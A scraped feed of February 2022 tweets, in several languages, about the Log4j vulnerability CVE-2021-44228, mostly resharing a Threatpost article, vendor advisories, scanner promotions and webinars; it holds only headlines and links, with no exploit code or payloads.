2022-02-17 22:23:44CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/WH1iaxLqjz https://dy.si/3t1EoJjasonahutson
2022-02-17 20:30:13@CocoNoCo3 ご連絡ありがとうございます。事実誤認がありますね。アステリアからの正式な情報はこちらです。 https://t.co/nMm4r5mmiUの脆弱性-CVE-2021-44228-について https://support.asteria.com/hc/ja/articles/4411831685401-Apache-Log4jpinahirano
2022-02-17 18:41:33CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/3nr3IXtHmj https://dy.si/HF2Q9ocjknoch
2022-02-17 17:00:14CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/I19MIdOjOW https://dy.si/DMasNtPhotoZel
2022-02-17 10:10:45HANA XSA log4j CVE-2021-44228 | SAP Blogs https://t.co/D89lyNrsjK https://t.co/cmy8vUDKDJ https://bit.ly/3gOHzMGemmama18
2022-02-17 05:40:24CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/HyxAugKloV https://dy.si/HD9NVukbordez
2022-02-17 03:50:05CMTY Podcast #592 - Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround https://t.co/mNomDEneix https://dy.si/sYBhYazaelcolon
2022-02-16 23:12:06IT Risk: AUTODESK.Apache Log4jを使用している製品に複数の脆弱性 サービス拒否 任意のコードの実行 https://t.co/i7W45RsSlH CVE-2021-44228 CVE-2021-450… https://t.co/pRlfx2PCFA https://www.autodesk.com/trust/security-advisories/adsk-sa-2021-0012 https://twitter.com/i/web/status/1494084858615767040management_sun
2022-02-16 10:30:09「Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート」の内容を更新しました|NTTデータ先端技術 「Apache Log4jに関する解説 1.6版」… https://t.co/Oyd35VFYS7 https://twitter.com/i/web/status/1493894251482345473intellilink_pr
2022-02-16 08:40:26ご参考までに、Snykより2月22日 12:00-13:00 に無料ウェビナーを開催いたします。 Log4Shell ライブハック〜CVE-2021-44228 脆弱性の検出と修正のデモ https://t.co/7XmC29kfBY #株式会社ラック https://go.snyk.io/Jp_webinar_20220222.htmlt_nihonmatsu
2022-02-16 01:51:33Detecting Automated Vulnerability Scanners: Log4j Zero-Day Vulnerability Case Study Log4j CVE-2021-44228 Since its… https://t.co/c6WYFHOABN https://twitter.com/i/web/status/1493762754531840000two_minwarning
2022-02-15 21:32:01Log4Shell: CVE-2021-44228 Not Dead Yet: @_JohnHammond a researcher at @HuntressLabs adds more useful 'noise' to th… https://t.co/ocIwj5giB4 https://twitter.com/i/web/status/1493697965617303556NicaraKenya
2022-02-15 16:23:40Apache log4j Vulnerability CVE-2021-44228: Analysis and Mitigations https://t.co/QEOUZm9TZL https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/PVynckier
2022-02-15 16:16:24A critical severity vulnerability (CVE-2021-44228) impacting multiple versions of the Apache Log4j library was disc… https://t.co/anJSB3IhJK https://twitter.com/i/web/status/1493616510878855178comtecpower
2022-02-15 07:20:36The vulnerability, listed as CVE-2021-44228 in the upper echelon of social media co….drunkSEOrobot
2022-02-15 01:00:19Xilinx Product Security Statement: CVE-2021-44228 Apache Log4j Vulnerability in Xilinx Products… https://t.co/XI2Yj7Pzzj https://twitter.com/i/web/status/1493387759008219137debugordie
2022-02-14 18:14:46The devastating zero-day, Apache Log4j (CVE-2021-44228), was exploited and everyone scrambled to patch it immediate… https://t.co/q1CLHTR3dU https://twitter.com/i/web/status/1493284011799719954CswWorks
2022-02-14 14:51:14Update for advisories OBS02112-01 (log4shell /CVE-2021-44228) and OBS02201-01 (CVE-2021-4104) published: check chan… https://t.co/bbkbwqAXf7 https://twitter.com/i/web/status/1493234257086537733UnifyCoSecurity
2022-02-14 14:11:08Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2022-24086: 2.6M (audience size) CVE-2021-44228: 327.9K CVE-2022-2… https://t.co/ujYlR2T82X https://twitter.com/i/web/status/1493223510927458307CVEtrends
2022-02-14 12:20:24Don't count on CVE-2021-44228, aka #Log4j, going quietly into the night... Full @threatpost story 👇 https://t.co/lfSW1xHrBb https://threatpost.com/log4shell-cve-2021-44228/178225/?utm_source=twitter&utm_medium=social&utm_campaign=uk_threatpost_db0077&utm_content=sm-post&utm_term=uk_twitter_organic_jqkxl77grd1oerakaspersky
2022-02-13 20:10:27📣 Log4Shell ライブハック開催!2/22(火)正午 CVE-2021-44228 脆弱性の検出と修正のデモを実施 ✅ Log4jの脆弱性であるLog4Shellの対策方法を検討している ✅ オープンソースなどの脆弱性… https://t.co/b2HRr0gOIN https://twitter.com/i/web/status/1492951745957400576snykJP
2022-02-13 17:00:08CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell) https://t.co/8tH4lcJwKF https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability_kosik_michelle
2022-02-12 11:50:08#GitHub's response to Log4j vulnerability CVE-2021-44228 https://t.co/MagcPNsRDb #CyberSecurity #TechJunkieNews https://t.co/a0MHPfYTgc https://bit.ly/3m3UWeOtechjunkiejh
2022-02-11 22:40:27@ArcherMail @gnome_196883 @Alpha4_3dom *cough* FireEye *coughs* Solarwinds *coughs* CVE-2021-44228 *coughs* ;PAkiretaHK
2022-02-11 16:33:37SAP February 2022 Security Patch Day addresses Critical log4j (CVE-2021-44228) and ICMAD (CVE-2022-22536) vulnerabi… https://t.co/q32fO633M5 https://twitter.com/i/web/status/1492174174105784324securezoo
2022-02-11 08:00:21Защитите свои приложения - сканируйте на наличие уязвимости log4j CVE-2021-44228 при помощи динамического сканирова… https://t.co/a5Btu8Zt0o https://twitter.com/i/web/status/1492045748053032960HCLSoftware
2022-02-10 14:10:04CVE-2021-44228 https://t.co/3OrbNrFoUw https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228kabukawa
2022-02-09 14:01:01Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2022-21703: 360.3K (audience size) CVE-2021-44228: 339.1K CVE-2021… https://t.co/OKa4goqSZ4 https://twitter.com/i/web/status/1491411572438278150CVEtrends
2022-02-09 13:45:04ICYMI - Don't count on CVE-2021-44228, aka #Log4j, going quietly into the night... Full @threatpost story 👇 https://t.co/lfSW1xHrBb https://threatpost.com/log4shell-cve-2021-44228/178225/?utm_source=twitter&utm_medium=social&utm_campaign=uk_threatpost_db0077&utm_content=sm-post&utm_term=uk_twitter_organic_jqkxl77grd1oerakaspersky
2022-02-09 12:51:38Continuously security your applications and scan for log4j vulnerability CVE-2021-44228 with #HCLAppScan's Dynamic… https://t.co/0kPUgeky3w https://twitter.com/i/web/status/1491391481399361545JavieMorales
2022-02-09 11:20:32‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/Kmyh6hdq4x https://t.co/YR91Jf4P4t http://dlvr.it/SJfgktHiconSecurity
2022-02-09 11:08:24Were you affected by the Log4j CVE-2021-44228 issue? We've got you covered! We’re happy to provide you with the… https://t.co/L1SdijUpWq https://twitter.com/i/web/status/1491366353403535361bruker
2022-02-09 07:01:14Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046) - Impact to Siemens Products https://t.co/4jcykyCAr8 https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdfsmh67dmrc
2022-02-08 23:56:13‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/JtLD7WfKkO https://t.co/Mx9n2sjGYf http://dlvr.it/SJdHFs7proxies7
2022-02-08 19:20:36今日リリースされた vCenter 6.5U3s, 6.7U3q と先日リリースされた 7.0U3c をもって、Log4j の脆弱性 (VMSA-2021-0028 / CVE-2021-44228, CVE-2021-45046… https://t.co/ioWOKZa3oj https://twitter.com/i/web/status/1491127784085008384makopicut
2022-02-08 18:30:30CVE-2021-44228 https://t.co/NLm0RVxfjG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-02-08 18:20:08Long Live Log4Shell CVE-2021-44228 Not Dead Yet https://t.co/rgLq9FSztb (via @threatpost) https://threatpost.com/log4shell-cve-2021-44228/178225/atomist
2022-02-08 15:10:49CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-02-08 14:10:36Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 454.7K (audience size) CVE-2022-21882: 267.9K CVE-2022… https://t.co/Gc5T8w7GwB https://twitter.com/i/web/status/1491049182949515268CVEtrends
2022-02-08 14:00:09Continuously security your applications and scan for log4j vulnerability CVE-2021-44228 with #HCLAppScan's Dynamic… https://t.co/QOqPPbAaya https://twitter.com/i/web/status/1491046791651151884a190468
2022-02-08 13:50:25ICYMI - don't count on CVE-2021-44228, aka #Log4j, going quietly into the night... Full @threatpost story 👇 https://t.co/lfSW1xHrBb https://threatpost.com/log4shell-cve-2021-44228/178225/?utm_source=twitter&utm_medium=social&utm_campaign=uk_threatpost_db0077&utm_content=sm-post&utm_term=uk_twitter_organic_jqkxl77grd1oerakaspersky
2022-02-08 11:55:01.@ProductCERT: An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/Y3koYsFBql https://twitter.com/i/web/status/1491015203101855744Woronka
2022-02-08 11:52:24.@ProductCERT: An advisory has been updated: "SSA-714170: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228,… https://t.co/bjk6GVLqbI https://twitter.com/i/web/status/1491015243245539329Woronka
2022-02-08 11:01:53An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/aYYvjaPz26 https://twitter.com/i/web/status/1491001853890359299ProductCERT
2022-02-08 11:01:12An advisory has been updated: "SSA-714170: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/D601b4mfJO https://twitter.com/i/web/status/1491002055829299206ProductCERT
2022-02-08 09:20:15Javaのロギング用ライブラリ、Log4jの脆弱性(CVE-2021-44228)についての情報をお届けしています。 「Log4jの脆弱性(CVE-2021-44228)への各種セキュリティ製品の対応」… https://t.co/FOLCtvsb4a https://twitter.com/i/web/status/1490977141554655235logstare
2022-02-08 07:00:17CVE-2021-44228 Not Dead Yet #Cybersecurity #infosec #security https://t.co/Zjp5drQhlP https://threatpost.com/log4shell-cve-2021-44228/178225/corizance
2022-02-08 06:00:25ぼくは偉いので、ちゃんとCVE-2021-44228とコミットコメントに書いて修正したことをアピールしたeaglesakura
2022-02-08 03:10:58A critical vulnerability was discovered in the Apache log4j project (CVE-2021-44228). Even if products and services… https://t.co/0EIXF4SJAW https://twitter.com/i/web/status/1490883185646972931remotedeskman
2022-02-07 21:20:18'Long Live #Log4Shell': CVE-2021-44228 Not Dead Yet https://t.co/hPbAIuLIfq #cybersecurity #vulnerability https://t.co/DEsaZGL9vi https://buff.ly/3JbB9TONcuIsao
2022-02-07 20:43:14Log4j bad vulnerability was CVE-2021-44228 that was fixed on Log4j 2.15.0 and UniFi Network 6.5.54. All other CVE’s… https://t.co/LsgCkXWBZ0 https://twitter.com/i/web/status/1490785125805834248underlinux
2022-02-07 18:00:05🟠Afirman que la #vulnerabilidad CVE-2021-44228 #Log4j estará presente durante mucho tiempo debido al gran uso de la… https://t.co/q1M5d39OYx https://twitter.com/i/web/status/1490746429681266690QintegraC
2022-02-07 16:56:46Continuously security your applications and scan for log4j vulnerability CVE-2021-44228 with #HCLAppScan's Dynamic… https://t.co/yofXVIYnEP https://twitter.com/i/web/status/1490598483463913477DeliverHcl
2022-02-07 16:50:21Continuously security your applications and scan for log4j vulnerability CVE-2021-44228 with #HCLAppScan #hcl… https://t.co/l80w2fOjFa https://twitter.com/i/web/status/1490723682745942022DeliverHcl
2022-02-07 15:40:07Continuously security your applications and scan for log4j vulnerability CVE-2021-44228 with #HCLAppScan's Dynamic… https://t.co/DSheC36HIl https://twitter.com/i/web/status/1490709604363169797brhee
2022-02-07 15:10:05CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-02-07 14:30:04‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet: https://t.co/eUtKpUHot4 via @threatpost #CyberSecurity #log4j https://threatpost.com/log4shell-cve-2021-44228/178225/Gate_15_Analyst
2022-02-07 14:10:12Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2022-21882: 1.5M (audience size) CVE-2021-44228: 451.7K CVE-2022-2… https://t.co/3rjXkoEAFx https://twitter.com/i/web/status/1490686795218096138CVEtrends
2022-02-07 13:50:13Don't count on CVE-2021-44228, aka #Log4j, going quietly into the night... Full @threatpost story 👇 https://t.co/lfSW1xHrBb https://threatpost.com/log4shell-cve-2021-44228/178225/?utm_source=twitter&utm_medium=social&utm_campaign=uk_threatpost_db0077&utm_content=sm-post&utm_term=uk_twitter_organic_jqkxl77grd1oerakaspersky
2022-02-07 12:20:09‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/zfTZQN0ZEU https://t.co/WcbZjAk5a2 https://threatpost.com/log4shell-cve-2021-44228/178225/tcultech
2022-02-07 12:00:07Continuously security your applications and scan for log4j vulnerability CVE-2021-44228 with #HCLAppScan's Dynamic… https://t.co/rH5IevLfUM https://twitter.com/i/web/status/1490655402996174849a190468
2022-02-07 08:00:06Continuously security your applications and scan for log4j vulnerability CVE-2021-44228 with #HCLAppScan's Dynamic… https://t.co/JwchTrQ7Dh https://twitter.com/i/web/status/1490595733958889473FranciscoJCarb1
2022-02-07 07:00:04‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet via @threatpost #Proficio #ThreatNews #Cybersecurity #MSSP #MDR https://t.co/yjapC2gE11 https://threatpost.com/log4shell-cve-2021-44228/178225/proficioinc
2022-02-07 05:50:10‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet #infosec #infosecurity #cybersecurity #threatintel… https://t.co/KoIlxvb0Fi https://twitter.com/i/web/status/1490561682703364098CyberIQs_
2022-02-07 04:10:06‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/KecwxsXQqr https://bit.ly/3GqGTrfBinaryBlogger
2022-02-07 01:30:05‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/WMcOemmjFk https://t.co/C7sNSuKK5h http://dlvr.it/SJVhmXCryptoExpress_
2022-02-06 23:30:08‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/cGOPGauqas https://threatpost.com/log4shell-cve-2021-44228/178225/safebits
2022-02-06 15:10:07CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-02-06 12:00:09‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet: https://t.co/bTrLoeyGtH https://threatpost.com/log4shell-cve-2021-44228/178225/fpientka
2022-02-06 09:00:09‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/Qb826Qts1D https://ift.tt/XkgsZPyHealthCyberInfo
2022-02-06 08:50:05‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/ryCqkvbmDF https://t.co/pOAOC4JZDe http://dlvr.it/SJSzPvandynorton27000
2022-02-06 04:00:06‘Long Live #Log4Shell’: We would love to say goodbye and good riddance to CVE-2021-44228, but unfortunately it is n… https://t.co/ZSbQp6WTB0 https://twitter.com/i/web/status/1490173314966294529deborah_galea
2022-02-06 03:40:08Long Live Log4Shell: CVE-2021-44228 Not Dead Yet https://t.co/ijS5aBVjU1 #Sec_Cyber https://www.securecybersolution.com/long-live-log4shell-cve-2021-44228-not-dead-yet/CyberSecDN
2022-02-06 00:30:03A Maior VULNERABILIDADE DO JAVA e MINECRAFT (CVE-2021-44228) - Log4j https://t.co/mVjEdfjAq9 via @YouTube https://youtu.be/oxFaS2oU854Advmarinho2
2022-02-05 21:00:17scan for #log4j #vulnerability CVE-2021-44228 with #HCLAppScan #testing #hclswlobp #coding #lowcode #javascript… https://t.co/3NmLN8m8TS https://twitter.com/i/web/status/1490066597054390275FraCurzi
2022-02-05 18:40:07#InfoSecInsider #Vulnerabilities #WebSecurity ‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/hjxiF0UNEt https://threatpost.com/log4shell-cve-2021-44228/178225/?utm_source=dlvr.it&utm_medium=twitteredwingeboers
2022-02-05 18:20:08‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/4im8Fs73yI #Threatpost https://threatpost.com/log4shell-cve-2021-44228/178225/SecurityNewsbot
2022-02-05 17:10:04'Long Live Log4Shell': CVE-2021-44228 Not Dead Yet: The ubiquitous Log4j bug will be with us for years. John Hammon… https://t.co/3O9ikzs3HE https://twitter.com/i/web/status/1490009334549557258IDTheftScout
2022-02-05 16:40:05‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/ENgYMi2DYI #bugbounty #bugbounties https://threatpost.com/log4shell-cve-2021-44228/178225/bugbounty18
2022-02-05 15:10:07CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2022-02-05 14:10:08Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 527.5K (audience size) CVE-2020-29661: 464K CVE-2022-2… https://t.co/3hbuskjGGs https://twitter.com/i/web/status/1489962019541463042CVEtrends
2022-02-05 12:50:13‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/LZMDV6MDMd https://t.co/X4ajJqLGdR http://dlvr.it/SJR64cOnyxCloudIT
2022-02-05 11:40:06‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/GpQmrX6KPG https://secoperations.pt/2022/02/05/long-live-log4shell-cve-2021-44228-not-dead-yet/RenatomrfNeves
2022-02-05 11:20:05log4j Huntress Log4Shell Vulnerability Tester https://t.co/gklHgWs9JB CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE… https://t.co/bY4vPkl0I8 https://log4shell.huntress.com/ https://twitter.com/i/web/status/1489920056708370436kn0ckkn0ck_
2022-02-05 11:20:04log4j Huntress Log4Shell Vulnerability Tester https://t.co/gklHgWs9JB CVE-2021-44228 - Log4j - MINECRAFT VULNERABLE… https://t.co/UwAJbthHfg https://log4shell.huntress.com/ https://twitter.com/i/web/status/1489920767487713286kn0ckkn0ck_
2022-02-05 11:10:06Highly recommended Log4j Vulnerability (Log4Shell) Explained // CVE-2021-44228 https://t.co/V4ZUEDoIJn via @YouTube @LiveOverflow https://youtu.be/w2F67LbEtnkdarksid34906417
2022-02-05 09:30:13‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/B0TVBX59Js https://threatpost.com/log4shell-cve-2021-44228/178225/oo0sn3rp0oo
2022-02-05 06:40:05‘Larga vida a Log4Shell’: CVE-2021-44228 Aún no está muerto https://t.co/D8YI6JdTN5 https://dearce.com.uy/larga-vida-a-log4shell-cve-2021-44228-aun-no-esta-muerto/ddearce
2022-02-05 05:30:19Continuously security your applications and scan for log4j vulnerability CVE-2021-44228 with #HCLAppScan's Dynamic… https://t.co/eAeGYhxUFS https://twitter.com/i/web/status/1489833666184310787HCLSoftware
2022-02-05 02:20:11‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/6j4IGVqaSn https://threatpost.com/log4shell-cve-2021-44228/178225/matsuu_zatsu
2022-02-05 01:00:11'Long Live Log4Shell': CVE-2021-44228 Not Dead Yet | Threatpost https://t.co/aLGv0ajrqY https://threatpost.com/log4shell-cve-2021-44228/178225/ohhara_shiojiri
2022-02-04 23:40:06‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet - https://t.co/lNWU2gMX1s https://threatpost.com/log4shell-cve-2021-44228/178225/ka0com
2022-02-04 23:10:19‘Long Live Log4Shell’: CVE-2021-44228 Belum Mati https://t.co/yHIB2Eq6K0 https://emka.web.id/computer-security/2022/long-live-log4shell-cve-2021-44228-belum-mati/emkawebid
2022-02-04 22:30:11‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/yCY3IKQRk6 https://anith.com/long-live-log4shell-cve-2021-44228-not-dead-yet-2/anith
2022-02-04 22:30:10‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/YzaudhSGoO https://anith.com/long-live-log4shell-cve-2021-44228-not-dead-yet/anith
2022-02-04 22:20:05The vulnerability, listed as CVE-2021-44228 in the last minute.drunkSEOrobot
2022-02-04 22:00:06‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/wccTuOXb2l http://dlvr.it/SJPhhpArabsyndikatet
2022-02-04 21:30:06‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/HEdVz5Hd6X #InfoSecInsider #Vulnerabilities #WebSecurity https://threatpost.com/log4shell-cve-2021-44228/178225/LudovicoLoreti
2022-02-04 20:40:42‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet: The ubiquitous Log4j bug will be with us for years. John Hammon… https://t.co/5KvTu5FZkh https://twitter.com/i/web/status/1489698286663454724DeepBlueInfoSec
2022-02-04 20:40:36Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet. #cybersecurity #hacking #security #hacker #technology #infosec… https://t.co/R9qOIu6YAD https://twitter.com/i/web/status/1489699076585435136Cybersec4u2
2022-02-04 20:30:11‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/cXsBxWKCir http://dlvr.it/SJPVW1shikata_ga_nai
2022-02-04 20:20:46‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet (via ⁦@threatpost⁩ ) https://t.co/swIVAuW9f2 https://threatpost.com/log4shell-cve-2021-44228/178225/_AJP_
2022-02-04 20:20:14‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/mm1LvecPxZ https://lnkd.in/e7v5g3Yfmortensl
2022-02-04 20:11:18‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/cxuXVLVYAE https://www.securecybersolution.com/long-live-log4shell-cve-2021-44228-not-dead-yet/Sec_Cyber
2022-02-04 20:11:00https://t.co/2W6uH5vFba ‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet #cybersecurity https://threatpost.com/log4shell-cve-2021-44228/178225/netsecu
2022-02-04 20:10:26‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet #security #cybersecurity https://t.co/wf7FGsnsib https://zpr.io/ESTSZDn5KHkP_CSNI_
2022-02-04 20:10:17‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/vVziEJY9Is https://www.blogpost.cu.ma/long-live-log4shell-cve-2021-44228-not-dead-yet/AliPk7332
2022-02-04 20:00:13‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet: The ubiquitous Log4j bug will be with us for years. John Hammon… https://t.co/hRQLNWw4EE https://twitter.com/i/web/status/1489688104814333957RW_Security
2022-02-04 20:00:06‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/m8aZ9RcxjB https://t.co/WIhWayrSf3 http://ow.ly/8Y05103ntuCcliffvazquez
2022-02-04 19:51:27CVE-2021-44228 Not Dead Yet #Infosec #cybersecurity #security https://t.co/TY9uzrEAF5 https://threatpost.com/log4shell-cve-2021-44228/178225/Necio_news
2022-02-04 19:50:20‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/UPcIwVkwIO https://ift.tt/KYI50TGsameedboas
2022-02-04 19:41:45Long Live Log4Shell': CVE-2021-44228 Not Dead Yet (https://t.co/XMI19yyjqa) The ubiquitous Log4j bug will be with… https://t.co/4rCuNipg1Y http://threatpost.com https://twitter.com/i/web/status/1489683488231940103InfoSec_b
2022-02-04 19:41:39‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/eH8OqGXQEc #Cybersecurity #Innovation #Fintech… https://t.co/wQOyPoYguF https://threatpost.com/log4shell-cve-2021-44228/178225/ https://twitter.com/i/web/status/1489683530011623429_silvino_
2022-02-04 19:40:06CVE-2021-44228 Not Dead Yet #Cybersecurity #infosec #security https://t.co/pXf0qIwAAP https://threatpost.com/log4shell-cve-2021-44228/178225/cybersecboardrm
2022-02-04 19:30:30‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/X9AlUdTLJ1 #vulnerabilities #hacks #security… https://t.co/2gwvyDiX43 https://ift.tt/KYI50TG https://twitter.com/i/web/status/1489680622322860034LanceSchukies
2022-02-04 19:20:06‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/BRE4NN9sj3 https://ift.tt/KYI50TGTheCloudCTO
2022-02-04 19:11:09'Long Live Log4Shell': CVE-2021-44228 Not Dead Yet.. https://t.co/jEAEDVMQmG https://threatpost.com/log4shell-cve-2021-44228/178225/snoep_IT
2022-02-04 19:11:08‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/B5pY9jcwRH https://t.co/0Dr7syZ77G http://i.securitythinkingcap.com/SJPGgzevanderburg
2022-02-04 19:11:03Threatpost | ‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/SMy4ukwUfn https://stpmvt.com/3urGoLaStopMalvertisin
2022-02-04 19:11:00‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/daPn79j83O http://dlvr.it/SJPGmFSecurityIdeals
2022-02-04 19:10:59‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/ENUMoU3mMR #news #cybersecurity #infosec https://t.co/nnUQMMUXwA http://dlvr.it/SJPGnlDeepFriedCyber
2022-02-04 19:10:54‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet: https://t.co/vpeedMK4QS by Threatpost #infosec #software #technology https://ift.tt/KYI50TGAlevskey
2022-02-04 19:10:53‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/oznkXpEpiX #cybersecurity https://ift.tt/KYI50TGNaveedHamid
2022-02-04 19:10:37New post from https://t.co/9KYxtdZjkl (‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet) has been published on https://t.co/OQ550bcBmM http://www.sesin.at https://www.sesin.at/2022/02/04/long-live-log4shell-cve-2021-44228-not-dead-yet/www_sesin_at
2022-02-04 19:10:36New post from https://t.co/uXvPWJy6tj (‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet) has been published on https://t.co/yEXuX1KmDE http://www.sesin.at https://www.sesin.at/2022/02/04/long-live-log4shell-cve-2021-44228-not-dead-yet/WolfgangSesin
2022-02-04 19:10:31‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yethttps://www.scssnys.com/long-live-log4shell-cve-2021-44228-not-dead-yet/SCSS_NYS
2022-02-04 19:10:30‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/toLHabH3KL https://t.co/nB21td1x2R http://dlvr.it/SJPHXyXc0resecurity
2022-02-04 19:10:29‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet: The ubiquitous Log4j bug will be with us for years. John Hammon… https://t.co/AZJQ0cY9Jj https://twitter.com/i/web/status/1489676520293421057cipherstorm
2022-02-04 19:10:27‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/NXe6IKAa5i https://t.co/OkvoMHTyN3 http://dlvr.it/SJPHYwliituk
2022-02-04 19:10:26‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet: The ubiquitous Log4j bug will be with us for years. John Hammon… https://t.co/Z2Cj7qpeXy https://twitter.com/i/web/status/1489676520767438851shah_sheikh
2022-02-04 19:10:24‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/jnxKz0qdio #InfoSecInsider #Vulnerabilities… https://t.co/2jnfxHzaaM http://dlvr.it/SJPHby https://twitter.com/i/web/status/1489676525582499841AcooEdi
2022-02-04 19:10:13‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/7t0g72DDfK #Security #Cyber #Cybersecurity https://ift.tt/KYI50TGJmw66
2022-02-04 19:10:07‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/3hzwZ7AL4W https://www.itsecuritynews.info/long-live-log4shell-cve-2021-44228-not-dead-yet/IT_securitynews
2022-02-04 19:00:17‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/wBMNE3K5oD https://zpr.io/EKaesrTdmbZmlcsnetworks
2022-02-04 19:00:11‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet | The ubiquitous Log4j bug will be with us for years. John Hammo… https://t.co/kj0ETl1G4I https://twitter.com/i/web/status/1489674907298447366ArrakisConsult
2022-02-04 19:00:08‘Long Live Log4Shell’: CVE-2021-44228 Not Dead Yet https://t.co/J4cMeawdia https://threatpost.com/log4shell-cve-2021-44228/178225/privsecnews
2022-02-04 15:31:30Update for advisories OBS02112-01 (log4shell /CVE-2021-44228) and OBS02201-01 (CVE-2021-4104) published: check chan… https://t.co/Oot9Q9kKkv https://twitter.com/i/web/status/1489619811466371073UnifyCoSecurity
2022-02-04 14:10:29Security Alert!! @mcnc would like to make you aware of the widespread Log4J vulnerability (CVE-2021-44228) in Dec… https://t.co/dxM9nLY3b7 https://twitter.com/i/web/status/1489599728492945417MCNCSecurity
2022-02-03 20:31:17If you're patching for CVE-2021-44228 (and you should be if you're running Java) #java, we released an opensource h… https://t.co/dvxtT8wKbt https://twitter.com/i/web/status/1489334699289948165hooverclemens
